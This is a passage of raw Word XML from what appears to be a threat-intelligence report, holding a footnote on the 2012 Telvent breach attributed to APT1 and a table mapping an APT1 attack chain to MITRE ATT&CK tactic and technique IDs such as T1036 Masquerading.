          <w:p w14:paraId="462FA1E9" w14:textId="77777777" w:rsidR="00FB3F04" w:rsidRPr="00FB3F04" w:rsidRDefault="00FB3F04" w:rsidP="00FB3F04">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00FB3F04">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">In September 2012, Brian Krebs of the “Krebs on Security” cybercrime blog reported on a security breach at </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C6350EC" w14:textId="77777777" w:rsidR="00FB3F04" w:rsidRPr="00FB3F04" w:rsidRDefault="00FB3F04" w:rsidP="00FB3F04">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FB3F04">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Telvent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FB3F04">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> Canada Ltd (now Schneider Electric), which we attributed to APT1 based on the tools and infrastructure </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68A7B245" w14:textId="7B48B8B5" w:rsidR="00845FF8" w:rsidRDefault="00FB3F04" w:rsidP="00FB3F04">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FB3F04">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>that the hackers used to exploit and gain access to the system.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00845FF8" w:rsidRPr="00B857D7" w14:paraId="23A3E175" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F997C5F" w14:textId="77777777" w:rsidR="00845FF8" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E451A2F" w14:textId="77777777" w:rsidR="00845FF8" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C0A5677" w14:textId="77777777" w:rsidR="00845FF8" w:rsidRDefault="00845FF8" w:rsidP="00EE74C6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D8A56C5" w14:textId="2F2FA161" w:rsidR="00845FF8" w:rsidRDefault="00845FF8" w:rsidP="00845FF8"/>
    <w:p w14:paraId="72F7C026" w14:textId="77777777" w:rsidR="002252F8" w:rsidRDefault="002252F8" w:rsidP="002252F8">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Technique Chain (Initial Access)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2593771B" w14:textId="77777777" w:rsidR="002252F8" w:rsidRPr="00223DC5" w:rsidRDefault="002252F8" w:rsidP="002252F8"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10343" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="615"/>
        <w:gridCol w:w="1547"/>
        <w:gridCol w:w="2260"/>
        <w:gridCol w:w="635"/>
        <w:gridCol w:w="608"/>
        <w:gridCol w:w="567"/>
        <w:gridCol w:w="1134"/>
        <w:gridCol w:w="2977"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F3C19" w:rsidRPr="002D1D50" w14:paraId="2D75D47F" w14:textId="77777777" w:rsidTr="00674213">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="254CFFAE" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="15F98AE2" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2151BD52" w14:textId="5F16B634" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>APT1_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="57D8B5A0" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6B3856F4" w14:textId="0669C77E" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="40DF2D25" w14:textId="2316D05E" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2FBC95DD" w14:textId="7AFFC2C0" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="70CE17D9" w14:textId="77777777" w:rsidR="001F3C19" w:rsidRPr="002D1D50" w:rsidRDefault="001F3C19" w:rsidP="001F3C19">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00674213" w:rsidRPr="002D1D50" w14:paraId="3DE50F24" w14:textId="77777777" w:rsidTr="00674213">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C65DEEF" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="002D1D50" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B2645A7" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="002D1D50" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="564ACE71" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="002D1D50" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EDE966D" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="002D1D50" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="357FBC14" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="002D1D50" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2119762D" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="002D1D50" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C3D911E" w14:textId="5BF3553A" w:rsidR="00674213" w:rsidRPr="002D1D50" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30F4E43F" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="002D1D50" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00674213" w:rsidRPr="002D1D50" w14:paraId="4C7A98A8" w14:textId="77777777" w:rsidTr="00674213">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1782B225" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="002D1D50" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BF8F5A9" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="002D1D50" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68F4FB0E" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="002D1D50" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19503DCD" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="002D1D50" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B9F4C1B" w14:textId="0B3233AD" w:rsidR="00674213" w:rsidRPr="002D1D50" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36336879" w14:textId="2CAD1B24" w:rsidR="00674213" w:rsidRPr="002D1D50" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="365FA2A9" w14:textId="78DC4AED" w:rsidR="00674213" w:rsidRPr="002D1D50" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DF00849" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="002D1D50" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00674213" w:rsidRPr="00B857D7" w14:paraId="550A8254" w14:textId="77777777" w:rsidTr="00674213">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="163F5175" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1624A29D" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00674213" w:rsidP="00674213">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260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="167F21DA" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00674213" w:rsidP="00674213">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35" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2642603E" w14:textId="449C7C94" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00592C17" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EB17E0E" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76D1F400" w14:textId="2E521C9F"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5B72FF44" w14:textId="5A367922" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65B7BE40" w14:textId="0FBE002F" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="000473CC" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00674213" w:rsidRPr="009F49DF" w14:paraId="1612A80C" w14:textId="77777777" w:rsidTr="00674213">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37D4176F" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="009F49DF" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F49DF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E93CB06" w14:textId="6D9F334F" w:rsidR="00674213" w:rsidRPr="009F49DF" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F49DF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009F49DF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>000</w:t>
            </w:r>
            <w:r w:rsidR="00670134">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidRPr="009F49DF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009F49DF">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60" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66E08CE1" w14:textId="1EC2D397" w:rsidR="00674213" w:rsidRPr="009F49DF" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1036</w:t>
            </w:r>
            <w:r w:rsidRPr="009F49DF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009F49DF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Ma</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>squerading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F897C90" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="009F49DF" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F49DF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E223C35" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="009F49DF" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="080FEA91" w14:textId="42642297" w:rsidR="00674213" w:rsidRPr="009F49DF" w:rsidRDefault="00592C17" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
